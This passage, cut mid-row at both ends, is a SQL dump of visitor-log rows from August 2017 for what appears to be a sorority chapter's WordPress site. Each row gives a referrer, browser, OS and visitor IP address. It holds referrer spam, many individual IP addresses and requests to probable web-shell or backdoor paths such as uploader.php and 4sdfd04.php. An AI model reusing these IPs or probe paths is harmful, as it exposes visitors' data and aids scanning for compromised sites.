2.227.114.133','000',1,0),(9072,'2017-08-15','https://mojpregled.com/','Opera','Windows','8.50','','46.118.154.36','000',3,0),(9073,'2017-08-15','http://zphiblgz.org','MSIE','Windows','6.0','','185.173.179.65','000',1,0),(9074,'2017-08-15','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',3,0),(9075,'2017-08-15','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',3,0),(9076,'2017-08-15','http://zphiblgz.org','Firefox','Windows','40.1','','105.184.29.199','000',1,0),(9077,'2017-08-15','http://zphiblgz.org','Firefox','Windows','40.1','','77.28.195.141','000',2,0),(9078,'2017-08-15','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0ahUKEwixmu6j_9nVAhWHxlQKHQI4BjIQFghMMAY&url=http%3A%2F%2Fzphiblgz.org%2F&usg=AFQjCNHl6iFFa_3VuMKJmTgYMIkup1fP8Q','MSIE','Windows','11.0','','198.179.4.253','000',1,0),(9079,'2017-08-15','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1514.gJCUitnQ4JNMOM3GikyEVw1O5ZuElrtyi6TjZXFb1nUFq8VQhlPjGZJ7-QQ5IWcz.e906a0224a540f464749a36113ddde315a586834&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YMkOSpatjLUqgxH-XWLwn-g&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSS1zUE1TOUU5TVVXSGFhclphLUdhcWdycjlVVFFtaFFQWmFZYUx1ck9MNHhvc1NVTEZ5ekR5&b64e=2&sign=abc263bfc29562e1d72dd07c8f723a72&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQXbYQp9t5VF6Id-0tQpc-XptUMh2SrZ5JdmlN-eYwJFbSIWIt3ieUcuLkFNMD2i1nBFlhdz2Mv5N_tOmb4g-0Yzp4dV1nidcubZEflYDRutMCKg5IJtcqwlU6uBypNAOexRjxoaglCTK&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCUano4BEc9IEQQ5PmK-tkmSooKJTyFzUcsAZoPgbBqPRSGz5QcpFnx5-W46r08eJWQyhYpXqgnYAQ&l10n=ru&cts=1502827340774&mc=6.9143670073','Firefox','Windows','53.0','','37.110.100.163','000',1,0),(9080,'2017-08-15','http://zphiblgz.org','Firefox','Windows','40.1','','73.139.190.93','000',1,0),(9081,'2017-08-15','http://zphiblgz.org','Firefox','Windows','40.1','','42.201.234.241','000',2,0),(9082,'2017-08-15','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1514.4YTQuIYHxG7kDDuQOC1k-M5hrYTh-l7vA8qgAj_92wDkAceruXFp608qXpxu-VGH.bbb7a675aac23405c14f2319f658cc245cdcb572&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YG-XUIUpxKrkaoPisARVvB8&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSS1zUE1TOUU5TVVUNDRGODhSN2ViOTBPOUdDem15NS1tREprU0Q4NjV5UkNkMkpSVHBvZlA0&b64e=2&sign=df715f4f08c1f227de15a38c9eedd7e9&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQe3IrxbPWIv4bzHmiU4CEc47_cDENXrO7PePRwwsTGU0TGRfPgm2Vfk1MobaIH_cNzyDVg71-IbpmnxvK7EEyrCYQHmdUzfOcSeABuHu0C9Z9nuIlv7i-45dEXgkZGA7k2PTP86gr2KT&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCVuecZlfhdRb6jCFLgdlcb8n70rFT2CcHOUXSKEnQfhGwEZN4HRThLNdtKsUpXnU7WUMbMEeausUQ&l10n=ru&cts=1502831388651&mc=7.46561557779','Firefox','Windows','53.0','','95.221.49.243','000',1,0),(9083,'2017-08-15','http://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.56','000',1,0),(9084,'2017-08-15','http://zphiblgz.org','Firefox','Windows','7.0.1','','162.247.73.206','000',1,0),(9085,'2017-08-15','http://zphiblgz.org/','Chrome','Windows','22.0.1229.79','','85.25.235.85','000',1,0),(9086,'2017-08-15','https://pregnant.guru/','MSIE','Windows','6.0','','188.163.79.53','000',2,0),(9087,'2017-08-15','http://zphiblgz.org','Firefox','Windows','7.0.1','','216.17.101.79','000',1,0),(9088,'2017-08-15','http://zphiblgz.org/','Firefox','Windows','7.0.1','','130.226.169.137','000',1,0),(9089,'2017-08-15','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','79.170.40.43','000',2,0),(9090,'2017-08-15','http://zphiblgz.org','Firefox','Windows','40.1','','86.99.43.177','000',1,0),(9091,'2017-08-15','https://www.google.com/','Chrome','Android','59.0.3071.125','','100.36.61.238','000',2,0),(9092,'2017-08-15','http://zphiblgz.org','Firefox','Windows','7.0.1','','91.197.234.102','000',2,0),(9093,'2017-08-15','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.172.193.32','000',2,0),(9094,'2017-08-15','http://zphiblgz.org','RobotsChecker','Unknown','0.6','','46.43.3.105','000',1,0),(9095,'2017-08-15','http://zphiblgz.org','RobotsChecker','Unknown','0.6','','213.138.109.226','000',1,0),(9096,'2017-08-15','http://zphiblgz.org','OrgProbe','Unknown','0.9.4','','2.120.161.48','000',1,0),(9097,'2017-08-15','http://zphiblgz.org','OrgProbe','Unknown','0.9.4','','81.187.72.193','000',1,0),(9098,'2017-08-15','http://zphiblgz.org','OrgProbe','Unknown','0.9.4','','86.170.38.198','000',1,0),(9099,'2017-08-15','http://zphiblgz.org','OrgProbe','Unknown','0.9.4','','79.70.41.153','000',1,0),(9100,'2017-08-15','http://zphiblgz.org/','Firefox','Windows','47.0','','185.158.104.20','000',9,0),(9101,'2017-08-15','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','43.240.65.62','000',1,0),(9102,'2017-08-15','http://zphiblgz.org','wp-iphone','Unknown','Unknown','','43.240.65.62','000',1,0),(9103,'2017-08-15','http://hannasolution.ru/','Opera','Windows','7.11','','46.118.154.36','000',2,0),(9104,'2017-08-15','http://www.zphibmaryland.org/chapters/','Safari','iPad','9.0','','98.252.56.15','000',3,0),(9105,'2017-08-15','http://zphiblgz.org','MSIE','Windows','11.0','','192.187.123.162','000',4,0),(9106,'2017-08-15','http://zphiblgz.org','Firefox','Macintosh','54.0','','138.197.111.90','000',1,0),(9107,'2017-08-15','https://twitter.com/vestapugh','Opera Next','Windows','44.0.2510.857','','185.36.102.114','000',2,0),(9108,'2017-08-15','http://zphiblgz.org','Firefox','Windows','40.1','','117.246.161.211','000',2,0),(9109,'2017-08-15','https://23kw.ru/','MSIE','Windows','6.0','','46.118.125.246','000',3,0),(9110,'2017-08-15','http://zphiblgz.org','Firefox','Windows','7.0.1','','65.19.167.131','000',1,0),(9111,'2017-08-16','http://zphiblgz.org/','Firefox','Windows','7.0.1','','162.220.246.230','000',1,0),(9112,'2017-08-16','zphiblgz.org','Chrome','Windows','50.0.2661.75','','204.10.105.9','000',23,0),(9113,'2017-08-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.34.210','000',2,0),(9114,'2017-08-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','164.132.106.162','000',1,0),(9115,'2017-08-16','http://zphiblgz.org/','Firefox','Windows','7.0.1','','145.239.157.75','000',1,0),(9116,'2017-08-16','http://krasivoe-hd.net/','MSIE','Windows','6.0','','46.118.118.100','000',5,0),(9117,'2017-08-16','http://zphiblgz.org','curl','Unknown','7.54.1','','5.61.44.59','000',1,0),(9118,'2017-08-16','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','213.181.210.161','000',2,0),(9119,'2017-08-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.20.55.18','000',2,0),(9120,'2017-08-16','http://zphiblgz.org','Firefox','Windows','40.1','','88.119.150.163','000',2,0),(9121,'2017-08-16','http://zphiblgz.org','MSIE','Windows','6.0','','46.17.42.76','000',1,0),(9122,'2017-08-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.196.1.129','000',2,0),(9123,'2017-08-16','http://zphiblgz.org','Firefox','Windows','40.1','','69.80.9.207','000',1,0),(9124,'2017-08-16','http://zphiblgz.org','Firefox','Windows','40.1','','151.76.177.118','000',1,0),(9125,'2017-08-16','http://se-welding.ru/','Opera','Windows','6.01','','46.118.118.100','000',3,0),(9126,'2017-08-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','144.217.161.119','000',2,0),(9127,'2017-08-16','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(9128,'2017-08-16','http://zphiblgz.org','Firefox','Windows','40.1','','182.180.167.161','000',2,0),(9129,'2017-08-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','176.126.252.11','000',1,0),(9130,'2017-08-16','http://zphiblgz.org/','Firefox','Windows','7.0.1','','130.226.169.137','000',3,0),(9131,'2017-08-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','162.213.3.221','000',2,0),(9132,'2017-08-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','216.218.134.12','000',2,0),(9133,'2017-08-16','http://zphiblgz.org','Unknown','Unknown','Unknown','','198.204.244.162','000',1,0),(9134,'2017-08-16','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','183.111.100.198','000',1,0),(9135,'2017-08-16','http://zphiblgz.org','Chrome','Windows','10.0.648.204','','198.240.83.69','000',1,0),(9136,'2017-08-16','https://stop-gepatit.te.ua/','MSIE','Windows','6.0','','178.137.4.41','000',6,0),(9137,'2017-08-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','65.19.167.132','000',2,0),(9138,'2017-08-16','http://zphiblgz.org','Firefox','Windows','40.1','','80.39.22.162','000',1,0),(9139,'2017-08-16','http://zphiblgz.org','Chrome','Windows','59.0.3071.86','','75.126.58.43','000',2,0),(9140,'2017-08-16','http://zphiblgz.org','Firefox','Windows','40.1','','80.215.78.56','000',1,0),(9141,'2017-08-16','http://www.z-master.ru/','MSIE','Windows','6.0','','134.249.80.194','000',6,0),(9142,'2017-08-16','http://zphiblgz.org','Firefox','Windows','40.1','','73.54.139.165','000',1,0),(9143,'2017-08-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','89.32.127.178','000',2,0),(9144,'2017-08-16','http://stroyplus.ru/','MSIE','Windows','6.0','','188.163.79.53','000',2,0),(9145,'2017-08-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','173.254.216.66','000',2,0),(9146,'2017-08-16','http://zphiblgz.org','Firefox','Windows','40.1','','182.48.66.118','000',1,0),(9147,'2017-08-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.205','000',2,0),(9148,'2017-08-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.206','000',2,0),(9149,'2017-08-16','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','23.80.148.201','000',1,0),(9150,'2017-08-16','http://zphiblgz.org','Firefox','Windows','40.1','','117.194.32.12','000',1,0),(9151,'2017-08-16','http://zphiblgz.org','MSIE','Windows','9.0','','131.253.25.70','000',1,0),(9152,'2017-08-16','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','74.220.215.77','000',2,0),(9153,'2017-08-16','http://zphiblgz.org','Firefox','Windows','40.1','','37.210.160.188','000',2,0),(9154,'2017-08-16','http://zphiblgz.org','Opera','Windows','12.14','','54.173.59.79','000',2,0),(9155,'2017-08-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.165','000',2,0),(9156,'2017-08-16','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.100.85.190','000',1,0),(9157,'2017-08-16','http://zphiblgz.org','Chrome','Linux','56.0.2924.87','','155.94.141.93','000',1,0),(9158,'2017-08-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.172.193.32','000',2,0),(9159,'2017-08-16','http://zphiblgz.org','Chrome','Windows','36.0.1985.125','','92.167.132.237','000',1,0),(9160,'2017-08-16','http://zphiblgz.org/wp-admin/','Chrome','Windows','36.0.1985.125','','82.215.159.242','000',1,0),(9161,'2017-08-16','http://zphiblgz.org/wp-admin/','Chrome','Windows','36.0.1985.125','','62.75.170.62','000',1,0),(9162,'2017-08-16','http://zphiblgz.org/wp-login.php?lang=en','Chrome','Windows','36.0.1985.125','','51.255.0.25','000',1,0),(9163,'2017-08-16','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',2,0),(9164,'2017-08-16','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.186','000',2,0),(9165,'2017-08-16','http://deshevo-nedorogo.ru/','Opera','Windows','9.0','','46.118.125.246','000',1,0),(9166,'2017-08-16','http://zphiblgz.org/wp-content/uploader.php','Chrome','Windows','42.0.2311.152','','163.172.255.16','000',1,0),(9167,'2017-08-16','http://zphiblgz.org','MSIE','Windows','6.0','','82.202.194.181','000',1,0),(9168,'2017-08-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.189.14.230','000',2,0),(9169,'2017-08-16','http://zphiblgz.org/','Firefox','Windows','7.0.1','','192.160.102.170','000',1,0),(9170,'2017-08-16','http://zphiblgz.org','Firefox','Windows','40.1','','88.88.136.208','000',1,0),(9171,'2017-08-16','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','174.136.26.133','000',1,0),(9172,'2017-08-16','http://zphiblgz.org/history/','Chrome','Windows','48.0.2564.103','','176.123.6.123','000',1,0),(9173,'2017-08-16','http://zphiblgz.org','Firefox','Windows','38.0','','176.123.6.123','000',1,0),(9174,'2017-08-16','zphiblgz.org','Chrome','Windows','50.0.2661.75','','128.199.157.152','000',19,0),(9175,'2017-08-16','https://spb-plitka.ru/','Unknown','Unknown','Unknown','','188.163.79.53','000',2,0),(9176,'2017-08-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.171.202.150','000',1,0),(9177,'2017-08-16','https://www.google.com/','Chrome','Macintosh','59.0.3071.115','','76.21.245.52','000',3,0),(9178,'2017-08-16','zphiblgz.org','Chrome','Windows','50.0.2661.75','','37.187.132.5','000',1,0),(9179,'2017-08-16','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','188.95.227.10','000',2,0),(9180,'2017-08-16','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','178.137.164.220','000',2,0),(9181,'2017-08-16','https://schock-store.ru/','MSIE','Windows','5.0','','46.118.154.36','000',2,0),(9182,'2017-08-16','http://zphiblgz.org','Firefox','Windows','40.1','','92.7.80.170','000',1,0),(9183,'2017-08-16','http://zphiblgz.org/','MSIE','Windows','8.0','','62.24.181.135','000',1,0),(9184,'2017-08-16','http://www.zphibmaryland.org/chapters/','AppleWebKit','iPhone','603.2.4','','69.121.35.20','000',2,0),(9185,'2017-08-17','http://zphiblgz.org/','AppleWebKit','iPhone','603.2.4','','69.121.35.20','000',1,0),(9186,'2017-08-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.201.225.45','000',2,0),(9187,'2017-08-17','http://zphiblgz.org/wp-content/themes/twentyfourteen/4sdfd04.php','MSIE','Windows','6.0','','91.211.205.171','000',1,0),(9188,'2017-08-17','http://zphiblgz.org','MSIE','Windows','6.0','','185.161.209.125','000',1,0),(9189,'2017-08-17','http://zphiblgz.org','MSIE','Windows','6.0','','82.202.194.181','000',1,0),(9190,'2017-08-17','http://zphiblgz.org/','Chrome','Windows','58.0.3029.96','','163.172.4.153','000',1,0),(9191,'2017-08-17','http://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.124','000',1,0),(9192,'2017-08-17','http://zphiblgz.org','Firefox','Windows','40.1','','79.185.38.204','000',2,0),(9193,'2017-08-17','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','162.254.250.112','000',1,0),(9194,'2017-08-17','http://zphiblgz.org','Firefox','Windows','28.0','','138.197.11.101','000',2,0),(9195,'2017-08-17','http://zphiblgz.org','MSIE','Windows','9.0','','138.197.11.101','000',1,0),(9196,'2017-08-17','http://zphiblgz.org','Chrome','Windows','34.0.1847.131','','138.197.11.101','000',1,0),(9197,'2017-08-17','http://zphiblgz.org','Firefox','Windows','21.0','','138.197.11.101','000',1,0),(9198,'2017-08-17','http://zphiblgz.org','Chrome','Macintosh','34.0.1847.131','','138.197.11.101','000',1,0),(9199,'2017-08-17','http://zphiblgz.org','MSIE','Windows','10.0','','138.197.11.101','000',2,0),(9200,'2017-08-17','http://zphiblgz.org','Chrome','Windows','34.0.1847.137','','138.197.11.101','000',1,0),(9201,'2017-08-17','http://zphiblgz.org','Unknown','Unknown','Unknown','','54.236.1.14','000',1,0),(9202,'2017-08-17','http://zphiblgz.org','Firefox','Windows','40.1','','125.164.150.97','000',1,0),(9203,'2017-08-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.17.97.112','000',2,0),(9204,'2017-08-17','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1516.GMBiS8d5crIBAjgWW5ZB4GbHZUN_YY5brV0SR2gcDnuXyKQiuzR82CX--DVkQiA3.405e3c84b4e979b3b61a7325b2b1217bb5fe85f2&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGftRg9cP1erjBfVTUcXDXk&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSS1zUE1TOUU5TVVTZm5ISDI3YnlXWVM5UVJTSml0eEg3NFJIR3RUWldKM0dGYk16bWV5X3F2&b64e=2&sign=5b8a03f8a7659854511cf30b4f6e9b3a&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYpgPUyh7uQlMv3oLFzqlnnKoHrVJOLU10sPKCqDrXkENJGs9pVadp-ybx0wVpZPYmKJSd7O0VfstzKm9kGHsKprC1iVPayXOevZI5cXk0FyQw52sc6zwtc3Q1nws-NBN9tfUSv04_hj&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXEfKO1imoOE0Vx3-i1_6NSRXgxkxfsM0_TKwwZwMaGOc8ddexJIz0aq7xMk6BOU-6bzYZtjm5mFA&l10n=ru&cts=1502958880664&mc=7.08077951755','Firefox','Windows','53.0','','95.220.212.83','000',1,0),(9205,'2017-08-17','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1516.SzHuXecL2CTH3bfs4dP8HdZLtqq5tB3xkU-YJTXFZVu-0IoBcKdgUA5Aa2LZKdh2.448812d53576ab20ddfd838501a6292c93994f5d&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YKCJkrjchpDstTwxTkjwGrA&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSS1zUE1TOUU5TVVjREZmWUM1YXNtRzFLdUY5aEw1cnZKTi1YYjQxZXQ0T056Vm41ZEREbkZP&b64e=2&sign=86be9c72c14bbb383e3dea485eef1172&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYuwSQLovbTTdfKxruwWhDg6VhmNqQMjEE2GWoEBeIc5N-0N7iwhjAj_F_WYJgbusRL7bm-50GslxDK74gf7gDkHV_XKL5sbsgUiOWwhage2lD3N9fA8rIuTjpxuXJ8IGA&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXdCnh-_wii4bO1Yk98gtyptRZc39AIUc-0SnH3sed2kfAxlWGmecckqMYG76binsyL75FVrgppdg&l10n=ru&cts=1502960257332&mc=3.15804760301','Firefox','Windows','53.0','','95.221.250.96','000',1,0),(9206,'2017-08-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.170','000',2,0),(9207,'2017-08-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','94.242.59.163','000',2,0),(9208,'2017-08-17','http://zphiblgz.org','Firefox','Windows','51.0','','167.114.233.118','000',2,0),(9209,'2017-08-17','https://educontest.net/','MSIE','Windows','5.0','','188.163.79.53','000',3,0),(9210,'2017-08-17','http://zphiblgz.org','Firefox','Windows','40.1','','190.96.5.162','000',1,0),(9211,'2017-08-17','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','157.7.105.236','000',2,0),(9212,'2017-08-17','http://zphiblgz.org','Firefox','Windows','40.1','','49.38.113.109','000',2,0),(9213,'2017-08-17','http://zphiblgz.org','Unknown','Unknown','Unknown','','119.23.71.80','000',1,0),(9214,'2017-08-17','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.96','000',1,0),(9215,'2017-08-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.164','000',2,0),(9216,'2017-08-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','109.201.133.100','000',2,0),(9217,'2017-08-17','http://zphiblgz.org/wp-content/plugins/theme-check/main.php','MSIE','Windows','6.0','','2.132.85.143','000',1,0),(9218,'2017-08-17','http://zphiblgz.org/','Chrome','Linux','56.0.2924.87','','155.94.141.168','000',1,0),(9219,'2017-08-17','http://zphiblgz.org','Firefox','Windows','40.1','','186.22.60.83','000',1,0),(9220,'2017-08-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.124.59.202','000',5,0),(9221,'2017-08-17','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','110.232.141.215','000',1,0),(9222,'2017-08-17','http://www.zphibmaryland.org/chapters/','MSIE','Windows','11.0','','198.179.4.254','000',11,0),(9223,'2017-08-17','http://zphiblgz.org','MSIE','Windows','6.0','','46.17.42.76','000',1,0),(9224,'2017-08-17','http://zphiblgz.org','Firefox','Windows','40.1','','46.0.130.153','000',1,0),(9225,'2017-08-17','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',2,0),(9226,'2017-08-17','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',2,0),(9227,'2017-08-17','http://zphiblgz.org','Chrome','Windows','60.0.3112.90','','23.31.193.133','000',5,0),(9228,'2017-08-17','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.84','000',1,0),(9229,'2017-08-17','http://zphiblgz.org/wp-xmlrpc.php?secret=111','Chrome','Windows','42.0.2311.152','','163.172.255.19','000',1,0),(9230,'2017-08-17','http://zphiblgz.org','Firefox','Windows','40.1','','201.14.254.175','000',2,0),(9231,'2017-08-17','http://zphiblgz.org','Firefox','Windows','31.0','','177.85.91.140','000',3,0),(9232,'2017-08-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','78.109.23.1','000',1,0),(9233,'2017-08-17','http://technika-remont.ru/','MSIE','Windows','2.0d','','46.118.125.246','000',5,0),(9234,'2017-08-17','http://zphiblgz.org','Firefox','Windows','40.1','','151.42.53.246','000',2,0),(9235,'2017-08-17','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','77.246.191.159','000',2,0),(9236,'2017-08-17','http://zphiblgz.org','wp-windowsphone','Unknown','Unknown','','77.246.191.159','000',1,0),(9237,'2017-08-17','http://zphiblgz.org','Firefox','Windows','40.1','','98.124.36.80','000',2,0),(9238,'2017-08-17','http://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.20','000',1,0),(9239,'2017-08-17','https://via-energy-order.com/','Opera','Windows','7.54','','46.118.154.36','000',2,0),(9240,'2017-08-17','https://www.google.com/','Chrome','Macintosh','55.0.2883.75','','71.244.251.83','000',5,0),(9241,'2017-08-17','http://zphiblgz.org','Chrome','Windows','36.0.1985.125','','43.231.210.191','000',3,0),(9242,'2017-08-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.34.210','000',2,0),(9243,'2017-08-17','http://zphiblgz.org','Firefox','Windows','40.1','','106.184.21.110','000',2,0),(9244,'2017-08-17','http://www.zphibmaryland.org/chapters/','Safari','iPhone','10.0','','73.201.199.79','000',4,0),(9245,'2017-08-17','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','62.210.245.197','000',2,0),(9246,'2017-08-17','http://zphiblgz.org','Firefox','Windows','40.1','','197.250.227.43','000',2,0),(9247,'2017-08-17','https://www.facebook.com/businesses.center/','MSIE','Windows','5.5','','178.137.4.41','000',1,0),(9248,'2017-08-17','https://vk.com/vps_vds_dedicated_server','MSIE','Windows','6.0','','134.249.80.194','000',2,0),(9249,'2017-08-17','https://mmostrike.ru/','MSIE','Unknown','6.0','','46.118.118.100','000',3,0),(9250,'2017-08-17','http://www.alt-servis.ru/','MSIE','Windows','4.01','','188.163.79.53','000',2,0),(9251,'2017-08-17','http://zphiblgz.org','Firefox','Windows','30.0','','167.249.225.200','000',14,0),(9252,'2017-08-17','https://moetomnenie.com/','MSIE','Windows','4.01','','46.118.154.36','000',1,0),(9253,'2017-08-18','http://www.zphibmaryland.org/chapters/','Chrome','Windows','60.0.3112.90','','96.240.136.34','000',11,0),(9254,'2017-08-18','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','62.210.245.197','000',2,0),(9255,'2017-08-18','http://zphiblgz.org','MSIE','Windows','11.0','','170.247.42.153','000',14,0),(9256,'2017-08-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','141.170.2.53','000',2,0),(9257,'2017-08-18','http://zphiblgz.org','Unknown','Unknown','Unknown','','158.69.26.144','000',14,0),(9258,'2017-08-18','http://zphiblgz.org','Chrome','Android','45.0.2454.94','','158.69.26.144','000',1,0),(9259,'2017-08-18','http://zphiblgz.org','Safari','iPhone','7.0','','65.55.210.166','000',1,0),(9260,'2017-08-18','http://zphiblgz.org','MSIE','Windows','6.0','','185.20.184.85','000',1,0),(9261,'2017-08-18','http://zphiblgz.org','Unknown','Unknown','Unknown','','178.159.37.111','000',12,0),(9262,'2017-08-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','158.69.220.128','000',2,0),(9263,'2017-08-18','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','208.91.198.19','000',2,0),(9264,'2017-08-18','http://zphiblgz.org/','Chrome','Windows','32.0.1700.107','','195.22.127.67','000',2,0),(9265,'2017-08-18','http://zphiblgz.org','Firefox','Windows','40.1','','108.20.178.120','000',2,0),(9266,'2017-08-18','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','162.247.72.199','000',1,0),(9267,'2017-08-18','http://www.shoppingmiracles.co.uk/','MSIE','Windows','5.5','','46.118.118.100','000',5,0),(9268,'2017-08-18','zphiblgz.org','Chrome','Windows','50.0.2661.75','','49.50.8.223','000',3,0),(9269,'2017-08-18','http://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.69','000',1,0),(9270,'2017-08-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','156.67.106.32','000',2,0),(9271,'2017-08-18','https://mansparskats.com/','MSIE','Windows','6.0','','188.163.79.53','000',4,0),(9272,'2017-08-18','http://zphiblgz.org','Firefox','Windows','40.1','','123.21.7.45','000',1,0),(9273,'2017-08-18','http://cool-wedding.net/','MSIE','Windows','6.0','','46.118.125.246','000',2,0),(9274,'2017-08-18','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','109.232.216.234','000',2,0),(9275,'2017-08-18','http://zphiblgz.org','WordPress','Unknown','Unknown','','109.232.216.234','000',2,0),(9276,'2017-08-18','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.96','000',1,0),(9277,'2017-08-18','http://zphiblgz.org','Firefox','Windows','3.0.1','','50.62.160.157','000',56,0),(9278,'2017-08-18','http://zphiblgz.org','Chrome','Android','56.0.2924.87','','172.58.21.77','000',2,0),(9279,'2017-08-18','http://zphiblgz.org','Firefox','Windows','30.0','','168.194.80.244','000',78,0),(9280,'2017-08-18','http://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.54','000',1,0),(9281,'2017-08-18','https://lechenie-gemorroya.com/','Unknown','Unknown','Unknown','','188.163.79.53','000',2,0),(9282,'2017-08-18','http://zphiblgz.org','Firefox','Windows','50.0','','201.18.18.173','000',5,0),(9283,'2017-08-18','http://zphiblgz.org','Safari','Macintosh','10.0.3','','45.32.146.159','000',1,0),(9284,'2017-08-18','http://zphiblgz.org','MSIE','Windows','11.0','','45.32.146.159','000',1,0),(9285,'2017-08-18','http://zphiblgz.org','Firefox','Windows','40.1','','187.209.105.42','000',2,0),(9286,'2017-08-18','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','103.67.235.104','000',2,0),(9287,'2017-08-18','http://zphiblgz.org','MSIE','Windows','6.0','','81.177.3.147','000',1,0),(9288,'2017-08-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.168','000',2,0),(9289,'2017-08-18','http://zphiblgz.org','Firefox','Windows','48.0','','78.85.216.48','000',1,0),(9290,'2017-08-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.171.163','000',2,0),(9291,'2017-08-18','https://esopini.com/','MSIE','Windows','6.0','','46.118.118.100','000',1,0),(9292,'2017-08-18','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',2,0),(9293,'2017-08-18','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.186','000',2,0),(9294,'2017-08-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.223.200','000',2,0),(9295,'2017-08-18','http://hdwallpapers-free.com/','MSIE','Windows','6.0','','178.137.4.41','000',3,0),(9296,'2017-08-18','http://zphiblgz.org','Firefox','Windows','40.1','','14.139.235.103','000',1